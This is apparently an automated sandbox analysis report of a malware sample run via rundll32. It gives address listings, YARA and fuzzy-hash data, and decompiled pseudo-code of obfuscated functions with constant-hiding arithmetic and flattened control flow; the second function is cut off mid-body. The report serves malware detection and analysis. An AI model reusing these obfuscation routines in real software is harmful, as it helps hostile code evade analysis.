                                                                      0x0200bda5
                                                                      0x0200bdad
                                                                      0x0200bdb5
                                                                      0x0200bdbd
                                                                      0x0200bdc5
                                                                      0x0200bdcd
                                                                      0x0200bddb
                                                                      0x0200bde0
                                                                      0x0200bde6
                                                                      0x0200bdeb
                                                                      0x0200bdf3
                                                                      0x0200bdfb
                                                                      0x0200be03
                                                                      0x0200be0f
                                                                      0x0200be14
                                                                      0x0200be1a
                                                                      0x0200be22
                                                                      0x0200be2f
                                                                      0x0200be32
                                                                      0x0200be3b
                                                                      0x0200be3f
                                                                      0x0200be44
                                                                      0x0200be4c
                                                                      0x0200be54
                                                                      0x0200be5c
                                                                      0x0200be69
                                                                      0x0200be6d
                                                                      0x0200be75
                                                                      0x0200be7d
                                                                      0x0200be85
                                                                      0x0200be8d
                                                                      0x0200be95
                                                                      0x0200be9d
                                                                      0x0200bea5
                                                                      0x0200bead
                                                                      0x0200beb5
                                                                      0x0200beba
                                                                      0x0200bec2
                                                                      0x0200becf
                                                                      0x0200bedb
                                                                      0x0200bee4
                                                                      0x0200bee5
                                                                      0x0200bee9
                                                                      0x0200bef1
                                                                      0x0200bef9
                                                                      0x0200befd
                                                                      0x0200bf05
                                                                      0x0200bf0d
                                                                      0x0200bf1b
                                                                      0x0200bf1f
                                                                      0x0200bf24
                                                                      0x0200bf2c
                                                                      0x0200bf2c
                                                                      0x0200bf31
                                                                      0x0200bf31
                                                                      0x0200bf31
                                                                      0x0200bf36
                                                                      0x00000000
                                                                      0x0200bf36
                                                                      0x0200bf48
                                                                      0x00000000
                                                                      0x0200c0bf
                                                                      0x0200bf54
                                                                      0x0200c03b
                                                                      0x0200c040
                                                                      0x0200c043
                                                                      0x0200c046
                                                                      0x0200c04d
                                                                      0x0200c052
                                                                      0x0200c057
                                                                      0x00000000
                                                                      0x0200c057
                                                                      0x0200bf60
                                                                      0x0200bfd6
                                                                      0x0200bfe9
                                                                      0x0200bfee
                                                                      0x0200bff1
                                                                      0x0200bff4
                                                                      0x0200bff6
                                                                      0x0200bf95
                                                                      0x0200bf95
                                                                      0x0200bf2c
                                                                      0x0200bf2c
                                                                      0x0200bf31
                                                                      0x0200bf31
                                                                      0x00000000
                                                                      0x0200bf31
                                                                      0x0200bf2c
                                                                      0x0200c00e
                                                                      0x0200c013
                                                                      0x0200c01e
                                                                      0x0200c023
                                                                      0x0200c026
                                                                      0x0200bf2c
                                                                      0x0200bf2c
                                                                      0x00000000
                                                                      0x0200bf2c
                                                                      0x0200bf2c
                                                                      0x0200bf64
                                                                      0x0200bf9c
                                                                      0x0200bfa4
                                                                      0x0200bfa8
                                                                      0x0200bfa9
                                                                      0x0200bfaf
                                                                      0x0200bfb7
                                                                      0x0200bfbc
                                                                      0x0200bfbf
                                                                      0x0200bfc2
                                                                      0x0200bfc9
                                                                      0x0200bfce
                                                                      0x00000000
                                                                      0x0200bfce
                                                                      0x0200bf68
                                                                      0x0200c09e
                                                                      0x0200c0a1
                                                                      0x0200c0a6
                                                                      0x0200c0a8
                                                                      0x00000000
                                                                      0x0200c0a8
                                                                      0x0200bf74
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200bf8d
                                                                      0x0200bf92
                                                                      0x00000000
                                                                      0x0200bf92
                                                                      0x0200c067
                                                                      0x0200c06a
                                                                      0x0200c070
                                                                      0x0200c073
                                                                      0x0200c075
                                                                      0x0200c081
                                                                      0x0200c08b
                                                                      0x00000000
                                                                      0x0200c08b
                                                                      0x0200c077
                                                                      0x00000000
                                                                      0x0200c090
                                                                      0x0200c090
                                                                      0x0200c090
                                                                      0x00000000
                                                                      0x0200bf36
                                                                      0x0200bf31

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 'B$,6$K&$UV$#$UV$#$UV$#$Vh$Z'$Z}$]n$qy$n$f
                                                                      • API String ID: 0-847790408
                                                                      • Opcode ID: 55f47aaf987221093f4fb0127f49abcf2b7e03b2f84cc68f62626fe1e952e847
                                                                      • Instruction ID: 6992f7d42f0e381b1a0c56b39567eed6dd0a251190ca550061b5e9f8bc7aa692
                                                                      • Opcode Fuzzy Hash: 55f47aaf987221093f4fb0127f49abcf2b7e03b2f84cc68f62626fe1e952e847
                                                                      • Instruction Fuzzy Hash: 12C1327190C3419FE358CF25D88951BFBE2BBD4708F108A1DF59A9A2A0D7B6C945CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024B165, Relevance: 16.5, Strings: 13, Instructions: 269COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 'B$,6$K&$UV$#$UV$#$UV$#$Vh$Z'$Z}$]n$qy$n$f
                                                                      • API String ID: 0-847790408
                                                                      • Opcode ID: d18db09b0faadfb061b988d01f744b8e64b01c7cb996795b6b3781eb3c0fd8c2
                                                                      • Instruction ID: 6b9d34abf4da12f3357196af0005c683de571a5deba3acc0022536d622dd7201
                                                                      • Opcode Fuzzy Hash: d18db09b0faadfb061b988d01f744b8e64b01c7cb996795b6b3781eb3c0fd8c2
                                                                      • Instruction Fuzzy Hash: 76C1427190C3419FE358CF25C88A40BFBE2BBD4718F508A1DF5969A2A0D7B5C959CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02003590, Relevance: 15.4, Strings: 12, Instructions: 440COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E02003590() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				void* _t494;
				signed int _t495;
				signed int _t498;
				void* _t507;
				signed int _t518;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				void* _t536;
				void* _t538;
				void* _t590;
				signed int* _t595;

				_t595 =  &_v1772;
				_v1576 = 0xd2493;
				_v1564 = 0;
				_v1572 = 0x5ead38;
				_v1568 = 0x4896fd;
				_v1724 = 0xb66c;
				_v1584 = 0;
				_t590 = 0x184e3bc6;
				_t521 = 0x45;
				_v1724 = _v1724 / _t521;
				_v1724 = _v1724 + 0x610;
				_v1724 = _v1724 >> 3;
				_v1724 = _v1724 ^ 0x0000013f;
				_v1616 = 0x7825;
				_t522 = 0x7d;
				_v1616 = _v1616 / _t522;
				_v1616 = _v1616 ^ 0x800000f7;
				_v1648 = 0x6e2f;
				_v1648 = _v1648 >> 0xb;
				_v1648 = _v1648 ^ 0x0000000f;
				_v1696 = 0x5cc1;
				_v1696 = _v1696 << 5;
				_v1696 = _v1696 | 0x9962b7ae;
				_v1696 = _v1696 ^ 0x996b80cb;
				_v1704 = 0xab0e;
				_t523 = 0x26;
				_v1704 = _v1704 / _t523;
				_v1704 = _v1704 << 6;
				_v1704 = _v1704 ^ 0x000171c2;
				_v1732 = 0xff6;
				_v1732 = _v1732 + 0xfe15;
				_v1732 = _v1732 + 0x96bf;
				_v1732 = _v1732 << 0xa;
				_v1732 = _v1732 ^ 0x0693792e;
				_v1708 = 0xab38;
				_v1708 = _v1708 | 0x290ab240;
				_v1708 = _v1708 ^ 0x3d842594;
				_v1708 = _v1708 ^ 0x148ed7f1;
				_v1740 = 0xabf1;
				_v1740 = _v1740 + 0x6b39;
				_t524 = 0x4d;
				_v1740 = _v1740 * 0x17;
				_v1740 = _v1740 / _t524;
				_v1740 = _v1740 ^ 0x00001e9b;
				_v1632 = 0xc8c7;
				_v1632 = _v1632 | 0x1dddad59;
				_v1632 = _v1632 ^ 0x1ddda3fd;
				_v1728 = 0x1984;
				_v1728 = _v1728 | 0xe50174fc;
				_v1728 = _v1728 >> 9;
				_v1728 = _v1728 + 0x6ab5;
				_v1728 = _v1728 ^ 0x0072ca13;
				_v1680 = 0xee20;
				_v1680 = _v1680 + 0x6894;
				_v1680 = _v1680 + 0xffff3cc6;
				_v1680 = _v1680 ^ 0x0000b209;
				_v1768 = 0xd586;
				_v1768 = _v1768 * 0x1f;
				_t525 = 0x5b;
				_v1768 = _v1768 / _t525;
				_v1768 = _v1768 >> 9;
				_v1768 = _v1768 ^ 0x00007c3b;
				_v1720 = 0x39b3;
				_v1720 = _v1720 + 0xffff1073;
				_v1720 = _v1720 ^ 0x7e8b47a9;
				_v1720 = _v1720 ^ 0xe8576451;
				_v1720 = _v1720 ^ 0x69231483;
				_v1592 = 0x2734;
				_t526 = 0x59;
				_v1592 = _v1592 * 0x5a;
				_v1592 = _v1592 ^ 0x000db9de;
				_v1752 = 0xd37e;
				_v1752 = _v1752 + 0xffff3b06;
				_v1752 = _v1752 | 0x8ba20300;
				_v1752 = _v1752 + 0xffff0a7e;
				_v1752 = _v1752 ^ 0x8ba122a9;
				_v1736 = 0xfdf5;
				_v1736 = _v1736 ^ 0x4b0a6dd0;
				_v1736 = _v1736 * 0x59;
				_v1736 = _v1736 + 0xffff8d92;
				_v1736 = _v1736 ^ 0x16abd156;
				_v1700 = 0xf9fc;
				_v1700 = _v1700 / _t526;
				_t527 = 0x24;
				_v1700 = _v1700 * 0x7a;
				_v1700 = _v1700 ^ 0x000160f5;
				_v1760 = 0x6097;
				_v1760 = _v1760 + 0x9028;
				_v1760 = _v1760 | 0x26d284d4;
				_v1760 = _v1760 + 0xffff62d1;
				_v1760 = _v1760 ^ 0x26d24200;
				_v1668 = 0x58a3;
				_v1668 = _v1668 / _t527;
				_v1668 = _v1668 | 0xce2be8fd;
				_v1668 = _v1668 ^ 0xce2b9730;
				_v1588 = 0x5dca;
				_v1588 = _v1588 | 0xcb121239;
				_v1588 = _v1588 ^ 0xcb12429b;
				_v1640 = 0xc4d;
				_v1640 = _v1640 ^ 0x11c7ddf0;
				_v1640 = _v1640 ^ 0x11c7841c;
				_v1676 = 0x21f1;
				_v1676 = _v1676 ^ 0x843604aa;
				_v1676 = _v1676 ^ 0x2f7d7e62;
				_v1676 = _v1676 ^ 0xab4b14fa;
				_v1596 = 0xafc7;
				_v1596 = _v1596 << 5;
				_v1596 = _v1596 ^ 0x0015f7ef;
				_v1692 = 0x8fa7;
				_t528 = 0x5a;
				_v1692 = _v1692 * 0x7c;
				_v1692 = _v1692 + 0x4cbf;
				_v1692 = _v1692 ^ 0x004598ea;
				_v1744 = 0x9dac;
				_v1744 = _v1744 | 0xb7a8ffb3;
				_v1744 = _v1744 / _t528;
				_v1744 = _v1744 ^ 0x020a4ecc;
				_v1652 = 0x6ace;
				_v1652 = _v1652 << 9;
				_v1652 = _v1652 ^ 0x00d5de13;
				_v1660 = 0xce58;
				_t529 = 3;
				_v1660 = _v1660 / _t529;
				_v1660 = _v1660 ^ 0xb363bbfe;
				_v1660 = _v1660 ^ 0xb36386d8;
				_v1748 = 0x5863;
				_v1748 = _v1748 | 0xab415f7d;
				_t530 = 0x38;
				_v1748 = _v1748 * 0x69;
				_v1748 = _v1748 ^ 0x3fd727f3;
				_v1748 = _v1748 ^ 0x020739d0;
				_v1608 = 0xb7;
				_v1608 = _v1608 + 0xffffc806;
				_v1608 = _v1608 ^ 0xffffd476;
				_v1600 = 0x1ae1;
				_v1600 = _v1600 / _t530;
				_v1600 = _v1600 ^ 0x00002061;
				_v1756 = 0x997c;
				_v1756 = _v1756 + 0xf405;
				_v1756 = _v1756 >> 4;
				_v1756 = _v1756 << 1;
				_v1756 = _v1756 ^ 0x0000255b;
				_v1764 = 0x43d1;
				_v1764 = _v1764 + 0x2011;
				_v1764 = _v1764 >> 6;
				_v1764 = _v1764 + 0xffff3985;
				_v1764 = _v1764 ^ 0xffff5831;
				_v1772 = 0x27fc;
				_v1772 = _v1772 << 4;
				_v1772 = _v1772 + 0xffff71df;
				_t531 = 0x70;
				_v1772 = _v1772 / _t531;
				_v1772 = _v1772 ^ 0x0000090e;
				_v1604 = 0xd94c;
				_t532 = 0x25;
				_v1604 = _v1604 * 0x68;
				_v1604 = _v1604 ^ 0x00581092;
				_v1624 = 0x5ea0;
				_v1624 = _v1624 * 0x74;
				_v1624 = _v1624 ^ 0x002af6cb;
				_v1636 = 0x3082;
				_v1636 = _v1636 >> 6;
				_v1636 = _v1636 ^ 0x00003692;
				_v1644 = 0x999e;
				_v1644 = _v1644 | 0x39006ece;
				_v1644 = _v1644 ^ 0x3900e31d;
				_v1684 = 0x1097;
				_v1684 = _v1684 | 0x83c0eeba;
				_v1684 = _v1684 / _t532;
				_v1684 = _v1684 ^ 0x038f86d4;
				_v1712 = 0xa774;
				_v1712 = _v1712 + 0xffffc475;
				_v1712 = _v1712 | 0x6e7db387;
				_v1712 = _v1712 ^ 0x6e7dd3da;
				_v1688 = 0xa5c3;
				_v1688 = _v1688 ^ 0xe96270b2;
				_v1688 = _v1688 * 0x25;
				_v1688 = _v1688 ^ 0xbb48b417;
				_v1612 = 0x2ed1;
				_t533 = 0x2c;
				_v1612 = _v1612 / _t533;
				_v1612 = _v1612 ^ 0x00007f35;
				_v1620 = 0x6bc9;
				_v1620 = _v1620 | 0x4f77e0ce;
				_v1620 = _v1620 ^ 0x4f778e3b;
				_v1672 = 0x5319;
				_v1672 = _v1672 | 0xbd54dbc0;
				_t534 = 0x61;
				_v1672 = _v1672 / _t534;
				_v1672 = _v1672 ^ 0x01f3c105;
				_v1628 = 0x8018;
				_v1628 = _v1628 << 0xb;
				_v1628 = _v1628 ^ 0x0400ec78;
				_v1716 = 0x3982;
				_v1716 = _v1716 | 0xa6eae1a8;
				_v1716 = _v1716 + 0xa320;
				_v1716 = _v1716 + 0xffffdd5b;
				_v1716 = _v1716 ^ 0xa6eb35eb;
				_v1656 = 0xdd8c;
				_v1656 = _v1656 >> 7;
				_v1656 = _v1656 + 0xffff2d32;
				_v1656 = _v1656 ^ 0xffff529e;
				_v1664 = 0xdc2e;
				_v1664 = _v1664 ^ 0x013d526f;
				_t535 = 0x14;
				_t518 = _v1584;
				_v1664 = _v1664 / _t535;
				_v1664 = _v1664 ^ 0x000fe0b7;
				while(1) {
					L1:
					_t536 = 0x5c;
					while(1) {
						L2:
						_t494 = 0x161f11dd;
						do {
							L3:
							if(_t590 == _t494) {
								_t495 = E0200232B(_v1712,  &_v1560, _v1688);
								_pop(_t538);
								_t498 = E01FF41AA(_v1580, _v1612, _v1664, _t538, _t518, _v1620, _v1672, _v1628,  &_v1560, 2 + _t495 * 2);
								_t595 =  &(_t595[8]);
								__eflags = _t498;
								_t590 = 0x2ed72160;
								_t451 = _t498 == 0;
								__eflags = _t451;
								_v1584 = 0 | _t451;
								goto L19;
							} else {
								if(_t590 == 0x184e3bc6) {
									_push(_t536);
									E01FF471A(_v1724,  &_v520, _v1696, _v1704, _v1732, _v1708, _v1740);
									_t595 =  &(_t595[8]);
									_t590 = 0x26d2b2b4;
									goto L1;
								} else {
									if(_t590 == 0x1977399b) {
										_push(0x1ff1368);
										_push(_v1652);
										_push(_v1744);
										_t542 = _v1596;
										__eflags = E02000A84(E01FF5DFC(_v1596, _v1692, __eflags), _v1660, _v1648, _v1748, _v1608, _v1596, _v1600, _v1596,  &_v1580, _v1616, _t542, _t542, _v1756, _v1764, _v1772, _v1604, _t542, _v1624);
										_t590 =  ==  ? 0x161f11dd : 0x12170868;
										E02000D6D(_v1636, _v1644, _v1684, _t502);
										_t595 =  &(_t595[0x15]);
										L19:
										_t494 = 0x161f11dd;
										_t536 = 0x5c;
										goto L20;
									} else {
										if(_t590 == 0x1bdb9a1c) {
											_t520 =  *0x2011088 + 0x38;
											while(1) {
												__eflags =  *_t520 - _t536;
												if(__eflags == 0) {
													break;
												}
												_t520 = _t520 + 2;
												__eflags = _t520;
											}
											_t518 = _t520 + 2;
											_t590 = 0x1977399b;
											goto L2;
										} else {
											if(_t590 == 0x26d2b2b4) {
												_push(0x1ff1308);
												_push(_v1768);
												_push(_v1680);
												_t507 = E01FF5DFC(_v1632, _v1728, __eflags);
												E0200D4E1( &_v1040, __eflags);
												E01FF98C5(0x104, __eflags, _v1720, _v1592, _v1752, _v1736, _v1700,  *0x2011088 + 0x254, _v1760, _v1668,  &_v1040,  *0x2011088 + 0x38, _t507,  &_v520);
												E02000D6D(_v1588, _v1640, _v1676, _t507);
												_t595 =  &(_t595[0x11]);
												_t590 = 0x1bdb9a1c;
												while(1) {
													L1:
													_t536 = 0x5c;
													L2:
													_t494 = 0x161f11dd;
													goto L3;
												}
											} else {
												if(_t590 != 0x2ed72160) {
													goto L20;
												} else {
													E020070CF(_v1716, _v1656, _v1580);
												}
											}
										}
									}
								}
							}
							L10:
							return _v1584;
							L20:
							__eflags = _t590 - 0x12170868;
						} while (__eflags != 0);
						goto L10;
					}
				}
			}




















































































                                                                      0x02003590
                                                                      0x02003596
                                                                      0x020035a3
                                                                      0x020035ac
                                                                      0x020035b7
                                                                      0x020035c2
                                                                      0x020035ce
                                                                      0x020035d5
                                                                      0x020035e0
                                                                      0x020035e5
                                                                      0x020035eb
                                                                      0x020035f3
                                                                      0x020035f8
                                                                      0x02003600
                                                                      0x02003612
                                                                      0x02003617
                                                                      0x02003620
                                                                      0x0200362b
                                                                      0x02003636
                                                                      0x0200363e
                                                                      0x02003646
                                                                      0x0200364e
                                                                      0x02003653
                                                                      0x0200365b
                                                                      0x02003663
                                                                      0x0200366f
                                                                      0x02003674
                                                                      0x0200367a
                                                                      0x0200367f
                                                                      0x02003687
                                                                      0x0200368f
                                                                      0x02003697
                                                                      0x0200369f
                                                                      0x020036a4
                                                                      0x020036ac
                                                                      0x020036b4
                                                                      0x020036bc
                                                                      0x020036c4
                                                                      0x020036cc
                                                                      0x020036d4
                                                                      0x020036e1
                                                                      0x020036e2
                                                                      0x020036ec
                                                                      0x020036f0
                                                                      0x020036f8
                                                                      0x02003703
                                                                      0x0200370e
                                                                      0x02003719
                                                                      0x02003721
                                                                      0x02003729
                                                                      0x0200372e
                                                                      0x02003736
                                                                      0x0200373e
                                                                      0x02003746
                                                                      0x0200374e
                                                                      0x02003756
                                                                      0x0200375e
                                                                      0x0200376b
                                                                      0x02003777
                                                                      0x0200377c
                                                                      0x02003782
                                                                      0x02003787
                                                                      0x0200378f
                                                                      0x02003797
                                                                      0x0200379f
                                                                      0x020037a7
                                                                      0x020037af
                                                                      0x020037b7
                                                                      0x020037ca
                                                                      0x020037cd
                                                                      0x020037d4
                                                                      0x020037df
                                                                      0x020037e7
                                                                      0x020037ef
                                                                      0x020037f7
                                                                      0x020037ff
                                                                      0x02003807
                                                                      0x0200380f
                                                                      0x0200381c
                                                                      0x02003820
                                                                      0x02003828
                                                                      0x02003830
                                                                      0x02003840
                                                                      0x02003849
                                                                      0x0200384c
                                                                      0x02003850
                                                                      0x02003858
                                                                      0x02003860
                                                                      0x02003868
                                                                      0x02003870
                                                                      0x02003878
                                                                      0x02003880
                                                                      0x02003890
                                                                      0x02003894
                                                                      0x0200389c
                                                                      0x020038a4
                                                                      0x020038af
                                                                      0x020038ba
                                                                      0x020038c5
                                                                      0x020038d0
                                                                      0x020038db
                                                                      0x020038e6
                                                                      0x020038ee
                                                                      0x020038f6
                                                                      0x020038fe
                                                                      0x02003906
                                                                      0x02003911
                                                                      0x02003919
                                                                      0x02003924
                                                                      0x02003931
                                                                      0x02003932
                                                                      0x02003936
                                                                      0x0200393e
                                                                      0x02003946
                                                                      0x0200394e
                                                                      0x0200395c
                                                                      0x02003960
                                                                      0x02003968
                                                                      0x02003973
                                                                      0x0200397b
                                                                      0x02003986
                                                                      0x0200399c
                                                                      0x020039a1
                                                                      0x020039aa
                                                                      0x020039b5
                                                                      0x020039c0
                                                                      0x020039c8
                                                                      0x020039d5
                                                                      0x020039d8
                                                                      0x020039dc
                                                                      0x020039e4
                                                                      0x020039ec
                                                                      0x020039f7
                                                                      0x02003a02
                                                                      0x02003a0d
                                                                      0x02003a23
                                                                      0x02003a2a
                                                                      0x02003a35
                                                                      0x02003a3d
                                                                      0x02003a45
                                                                      0x02003a4a
                                                                      0x02003a4e
                                                                      0x02003a56
                                                                      0x02003a5e
                                                                      0x02003a66
                                                                      0x02003a6b
                                                                      0x02003a73
                                                                      0x02003a7b
                                                                      0x02003a83
                                                                      0x02003a88
                                                                      0x02003a94
                                                                      0x02003a99
                                                                      0x02003a9f
                                                                      0x02003aa7
                                                                      0x02003aba
                                                                      0x02003abb
                                                                      0x02003ac2
                                                                      0x02003acd
                                                                      0x02003ae0
                                                                      0x02003ae7
                                                                      0x02003af2
                                                                      0x02003afd
                                                                      0x02003b05
                                                                      0x02003b10
                                                                      0x02003b1b
                                                                      0x02003b26
                                                                      0x02003b31
                                                                      0x02003b39
                                                                      0x02003b47
                                                                      0x02003b4b
                                                                      0x02003b53
                                                                      0x02003b5b
                                                                      0x02003b63
                                                                      0x02003b6b
                                                                      0x02003b73
                                                                      0x02003b7b
                                                                      0x02003b88
                                                                      0x02003b8c
                                                                      0x02003b96
                                                                      0x02003baa
                                                                      0x02003baf
                                                                      0x02003bb8
                                                                      0x02003bc8
                                                                      0x02003bd3
                                                                      0x02003bde
                                                                      0x02003be9
                                                                      0x02003bf1
                                                                      0x02003bfd
                                                                      0x02003c02
                                                                      0x02003c08
                                                                      0x02003c10
                                                                      0x02003c1b
                                                                      0x02003c23
                                                                      0x02003c2e
                                                                      0x02003c36
                                                                      0x02003c3e
                                                                      0x02003c46
                                                                      0x02003c4e
                                                                      0x02003c56
                                                                      0x02003c61
                                                                      0x02003c69
                                                                      0x02003c74
                                                                      0x02003c7f
                                                                      0x02003c8a
                                                                      0x02003c9c
                                                                      0x02003c9f
                                                                      0x02003ca6
                                                                      0x02003caa
                                                                      0x02003cb2
                                                                      0x02003cb2
                                                                      0x02003cb4
                                                                      0x02003cb5
                                                                      0x02003cb5
                                                                      0x02003cb5
                                                                      0x02003cba
                                                                      0x02003cba
                                                                      0x02003cbc
                                                                      0x02003ed9
                                                                      0x02003ede
                                                                      0x02003f1b
                                                                      0x02003f22
                                                                      0x02003f25
                                                                      0x02003f27
                                                                      0x02003f2c
                                                                      0x02003f2c
                                                                      0x02003f2f
                                                                      0x00000000
                                                                      0x02003cc2
                                                                      0x02003cc8
                                                                      0x02003e97
                                                                      0x02003eb8
                                                                      0x02003ebd
                                                                      0x02003ec0
                                                                      0x00000000
                                                                      0x02003cce
                                                                      0x02003cd0
                                                                      0x02003deb
                                                                      0x02003df0
                                                                      0x02003df7
                                                                      0x02003dff
                                                                      0x02003e65
                                                                      0x02003e87
                                                                      0x02003e8a
                                                                      0x02003e8f
                                                                      0x02003f36
                                                                      0x02003f38
                                                                      0x02003f3d
                                                                      0x00000000
                                                                      0x02003cd6
                                                                      0x02003cdc
                                                                      0x02003dd4
                                                                      0x02003ddc
                                                                      0x02003ddc
                                                                      0x02003ddf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02003dd9
                                                                      0x02003dd9
                                                                      0x02003dd9
                                                                      0x02003de1
                                                                      0x02003de4
                                                                      0x00000000
                                                                      0x02003ce2
                                                                      0x02003ce8
                                                                      0x02003d20
                                                                      0x02003d25
                                                                      0x02003d29
                                                                      0x02003d38
                                                                      0x02003d46
                                                                      0x02003da1
                                                                      0x02003dbc
                                                                      0x02003dc1
                                                                      0x02003dc4
                                                                      0x02003cb2
                                                                      0x02003cb2
                                                                      0x02003cb4
                                                                      0x02003cb5
                                                                      0x02003cb5
                                                                      0x00000000
                                                                      0x02003cb5
                                                                      0x02003cea
                                                                      0x02003cf0
                                                                      0x00000000
                                                                      0x02003cf6
                                                                      0x02003d08
                                                                      0x02003d0d
                                                                      0x02003cf0
                                                                      0x02003ce8
                                                                      0x02003cdc
                                                                      0x02003cd0
                                                                      0x02003cc8
                                                                      0x02003d0e
                                                                      0x02003d1f
                                                                      0x02003f3e
                                                                      0x02003f3e
                                                                      0x02003f3e
                                                                      0x00000000
                                                                      0x02003f4a
                                                                      0x02003cb5

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $%x$/n$4'$9k$;|$QdW$[%$a $b~}/$cX$x
                                                                      • API String ID: 0-2114610450
                                                                      • Opcode ID: 29840740e1253ce522f88b8eed34185ee17de76963fa8b1e6f58fd57c191dda7
                                                                      • Instruction ID: b1989ce147089c46fc75b2bc2f4c3c78a1972168e953e2024096f704eb17f57d
                                                                      • Opcode Fuzzy Hash: 29840740e1253ce522f88b8eed34185ee17de76963fa8b1e6f58fd57c191dda7
                                                                      • Instruction Fuzzy Hash: 4232037150D380DFE368CF25D88AB9BBBE2BBC5304F10891DE199862A0D7B59949CF03
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02007187, Relevance: 15.4, Strings: 12, Instructions: 369COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 97%
                                                                      			E02007187(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr* _v152;
				char _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _t406;
				signed int _t410;
				void* _t417;
				intOrPtr _t433;
				intOrPtr* _t436;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				intOrPtr _t485;
				void* _t486;
				intOrPtr* _t493;
				signed int* _t494;
				signed int* _t495;
				signed int* _t496;

				_t436 = __ecx;
				_t494 =  &_v320;
				_v144 = 0x3f72af;
				_v136 = 0;
				_v132 = 0;
				_v140 = 0x419dab;
				_v172 = 0xb463;
				_v148 = __edx;
				_t486 = 0x2fd49363;
				_v152 = __ecx;
				_t478 = 0x59;
				_v172 = _v172 / _t478;
				_v172 = _v172 ^ 0x00001d3c;
				_v212 = 0x8309;
				_v212 = _v212 | 0x8582e029;
				_v212 = _v212 ^ 0x8582ffb6;
				_v196 = 0x538d;
				_v196 = _v196 | 0x45df7b90;
				_v196 = _v196 ^ 0x45df0507;
				_v220 = 0x862c;
				_v220 = _v220 + 0xb39a;
				_v220 = _v220 ^ 0x00010d91;
				_v232 = 0x9f44;
				_v232 = _v232 ^ 0x181d052d;
				_t479 = 0x60;
				_v232 = _v232 / _t479;
				_v232 = _v232 ^ 0x00407958;
				_v164 = 0x87c0;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x000420a8;
				_v252 = 0x893b;
				_v252 = _v252 + 0xffff57e5;
				_v252 = _v252 + 0xffff4235;
				_v252 = _v252 ^ 0xffff2531;
				_v228 = 0xe4b4;
				_v228 = _v228 ^ 0x8f8823fd;
				_v228 = _v228 + 0xffffac51;
				_v228 = _v228 ^ 0x8f8836c7;
				_v292 = 0x30ec;
				_v292 = _v292 + 0xffff5b52;
